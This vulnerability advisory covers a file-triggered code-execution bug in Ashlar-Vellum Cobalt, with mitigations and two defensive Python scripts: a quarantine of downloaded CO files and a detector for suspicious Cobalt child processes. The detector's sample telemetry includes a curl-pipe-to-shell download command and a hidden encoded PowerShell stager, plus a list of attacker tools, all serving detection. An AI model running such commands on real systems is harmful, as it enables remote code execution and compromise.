CVE-2023-34311

7.8 HIGH

📋 TL;DR

This vulnerability allows an attacker to execute arbitrary code on Ashlar-Vellum Cobalt installations by tricking a user into opening a malicious CO file. The code runs with the privileges of the user who opened the file; no authentication is required, but the victim must open the file. All users of unpatched Ashlar-Vellum Cobalt versions are affected.

💻 Affected Systems

Products:
  • Ashlar-Vellum Cobalt
Versions: All versions prior to the security update
Operating Systems: Windows, macOS
Default Config Vulnerable: ⚠️ Yes
Notes: All default installations are vulnerable. User interaction required (opening malicious file).

📦 What is this software?

Ashlar-Vellum Cobalt is a commercial 3D modeling and CAD application for Windows and macOS. CO is its native drawing file format, which is why a crafted CO file is the delivery vector for this bug.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete system compromise with attacker gaining full control of the affected machine, potentially leading to data theft, ransomware deployment, or lateral movement within the network.

🟠

Likely Case

Arbitrary code execution as the logged-in user once a malicious CO file is opened, leading to data exfiltration or installation of persistent malware on the affected workstation. The bug itself does not elevate privileges; whatever the user can reach, the payload can reach.

🟢

If Mitigated

Application crash only, where Cobalt runs as a restricted user or inside a sandbox that contains the payload.

🌐 Internet-Facing: MEDIUM
🏢 Internal Only: HIGH

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: MEDIUM

Exploitation requires user interaction but is straightforward once the malicious file is opened. ZDI has confirmed the vulnerability.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Check with Ashlar-Vellum for specific patched version

Vendor Advisory: https://www.ashlar.com/security-advisories/

Restart Required: Yes

Instructions:

1. Contact Ashlar-Vellum support for security update
2. Download and install the latest patched version
3. Restart the application and system

🔧 Temporary Workarounds

Restrict CO file handling (platforms: all)

Block or restrict opening of CO files from untrusted sources. Mail attachments, downloads and external shares are the realistic delivery paths, since the victim has to open the file for the bug to trigger.

Application sandboxing (platforms: all)

Run Cobalt with reduced privileges or in a sandboxed environment, so that code executing inside the Cobalt process cannot reach beyond the user's own data.
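
One way to enforce the "restrict CO files from untrusted sources" workaround on Windows, as an added example that is not part of this advisory or of any Ashlar-Vellum tooling: browsers and mail clients tag downloaded files with a Zone.Identifier alternate data stream (Mark-of-the-Web), so a scheduled script can move CO files whose ZoneId is Internet (3) or Restricted (4) into a quarantine directory before a user double-clicks them. The directory names are assumptions; macOS uses the com.apple.quarantine extended attribute instead and is not covered by this script.

```python
"""Quarantine CO files that carry an Internet or Restricted Mark-of-the-Web."""
import shutil
from pathlib import Path

# Windows URL security zones as recorded in the Zone.Identifier stream:
# 0 = local machine, 1 = intranet, 2 = trusted sites, 3 = Internet, 4 = restricted.
UNTRUSTED_ZONES = {3, 4}


def parse_zone_identifier(text):
    """Return the ZoneId from a Zone.Identifier stream body, or None if absent.

    A typical stream written by a browser looks like:
        [ZoneTransfer]
        ZoneId=3
        ReferrerUrl=https://example.test/
        HostUrl=https://example.test/part.co
    """
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if line.lower() == "[zonetransfer]":
            in_section = True
        elif in_section and line.lower().startswith("zoneid="):
            value = line.split("=", 1)[1].strip()
            return int(value) if value.isdigit() else None
    return None


def read_zone_id(path):
    """Read ZoneId from the file's NTFS alternate data stream.

    Returns None when there is no stream: a locally created file, a non-NTFS
    volume, or a non-Windows host (where the ':' path simply fails to open)."""
    try:
        with open(f"{path}:Zone.Identifier", encoding="utf-8", errors="replace") as stream:
            return parse_zone_identifier(stream.read())
    except OSError:
        return None


def classify(path, zone_id):
    """Decide what to do with one file: only .co files are in scope, and only
    those that arrived from an untrusted zone get quarantined."""
    if Path(path).suffix.lower() != ".co":
        return "ignore"
    if zone_id in UNTRUSTED_ZONES:
        return "quarantine"
    return "allow"


def quarantine_untrusted_co_files(root, quarantine_dir, dry_run=True):
    """Walk `root` and move untrusted CO files into `quarantine_dir`.

    Returns the list of files that were (or, with dry_run=True, would be) moved.
    Moving within the same NTFS volume keeps the Zone.Identifier stream intact,
    so the file stays marked if it is later restored."""
    root, quarantine_dir = Path(root), Path(quarantine_dir)
    hits = []
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        if classify(path, read_zone_id(path)) != "quarantine":
            continue
        hits.append(path)
        if not dry_run:
            quarantine_dir.mkdir(parents=True, exist_ok=True)
            shutil.move(str(path), str(quarantine_dir / path.name))
    return hits


if __name__ == "__main__":
    # Hypothetical directories; review the dry-run list before setting dry_run=False.
    downloads = Path.home() / "Downloads"
    quarantine = Path.home() / "CO-quarantine"
    for hit in quarantine_untrusted_co_files(downloads, quarantine, dry_run=True):
        print("would quarantine:", hit)
```

Run it as a scheduled task under the user's own account so it can read the stream on their profile directories; files created locally by Cobalt have no Zone.Identifier stream and are left alone, which is the point of keying on origin rather than on the extension alone.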

🧯 If You Can't Patch

  • Implement application allowlisting so that a payload dropped by a malicious CO file cannot execute
  • Use network segmentation to isolate affected systems

🔍 How to Verify

Check if Vulnerable:

Check Ashlar-Vellum Cobalt version against vendor's security advisory

Check Version:

Check within Cobalt application: Help → About

Verify Fix Applied:

Verify installation of patched version from vendor

📡 Detection & Monitoring

Log Indicators:

  • Unexpected crashes of the Cobalt process, particularly right after a CO file is opened (a failed exploitation attempt typically ends in a crash)
  • Suspicious file opening events: CO files opened from mail attachment, download or temporary directories
  • Unusual process creation from Cobalt: shells, script interpreters or other tooling with the Cobalt process as parent

Network Indicators:

  • Unexpected outbound connections from Cobalt process

SIEM Query:

Process creation where parent_process contains 'cobalt' AND process_name not in (expected_process_list)
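
The SIEM query above as working detection logic, added here as an example rather than anything from the advisory or the vendor: it reads Sysmon Event ID 1 style process-creation records (fields Image, ParentImage, CommandLine, User), keeps those whose parent is Cobalt, drops the children Cobalt is expected to spawn, and rates the rest. The Cobalt executable names, the allowlist and the sample events are assumptions constructed for the example; confirm the binary names against a real install before deploying.

```python
"""Flag unexpected child processes of Ashlar-Vellum Cobalt in process-creation telemetry."""
import json

# Assumed executable names for Cobalt on Windows and macOS (not listed in the advisory).
COBALT_PARENT_NAMES = {"cobalt.exe", "cobalt"}

# Assumed allowlist of children Cobalt legitimately spawns; tune to your estate.
EXPECTED_CHILDREN = {"werfault.exe", "conhost.exe"}

# Interpreters and LOLBins that indicate a payload stage rather than a crash handler.
HIGH_RISK_CHILDREN = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "rundll32.exe",
    "wscript.exe", "cscript.exe", "regsvr32.exe", "certutil.exe",
    "sh", "bash", "zsh", "osascript", "python", "python3",
}


def basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def flag_unexpected_children(events):
    """Return one finding per event whose parent is Cobalt and whose child is not allowlisted."""
    findings = []
    for ev in events:
        parent = basename(ev.get("ParentImage", ""))
        child = basename(ev.get("Image", ""))
        if parent not in COBALT_PARENT_NAMES or child in EXPECTED_CHILDREN:
            continue
        findings.append({
            "host": ev.get("Computer", "?"),
            "user": ev.get("User", "?"),
            "child": child,
            "cmdline": ev.get("CommandLine", ""),
            "severity": "high" if child in HIGH_RISK_CHILDREN else "medium",
        })
    return findings


def parse_jsonl(text):
    """One JSON object per line, blank lines skipped (the usual EDR export shape)."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


# Constructed sample telemetry, not real logs: a benign crash handler, a PowerShell
# stager, Cobalt itself being launched by Explorer, and a macOS shell child.
SAMPLE_LOG = r"""
{"Computer": "CAD-WS01", "User": "CORP\\jdoe", "ParentImage": "C:\\Program Files\\Ashlar-Vellum\\Cobalt\\Cobalt.exe", "Image": "C:\\Windows\\System32\\WerFault.exe", "CommandLine": "WerFault.exe -u -p 4120"}
{"Computer": "CAD-WS01", "User": "CORP\\jdoe", "ParentImage": "C:\\Program Files\\Ashlar-Vellum\\Cobalt\\Cobalt.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgA"}
{"Computer": "CAD-WS02", "User": "CORP\\asmith", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Program Files\\Ashlar-Vellum\\Cobalt\\Cobalt.exe", "CommandLine": "Cobalt.exe \"C:\\Users\\asmith\\Downloads\\part.co\""}
{"Computer": "cad-mac03", "User": "bwong", "ParentImage": "/Applications/Cobalt.app/Contents/MacOS/Cobalt", "Image": "/bin/sh", "CommandLine": "/bin/sh -c \"curl -s http://198.51.100.7/s | sh\""}
"""


def run():
    """Apply the detection to the constructed sample and return the findings."""
    return flag_unexpected_children(parse_jsonl(SAMPLE_LOG))


if __name__ == "__main__":
    for finding in run():
        print(finding)
```

Only the second and fourth records survive: WerFault is on the allowlist, and the third record has Cobalt as the child, not the parent. The severity split matters in practice, because a crash handler or a help viewer launched by Cobalt is noise, while a shell or script interpreter with Cobalt as parent is what a CO-file exploit looks like at the process level.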

🔗 References
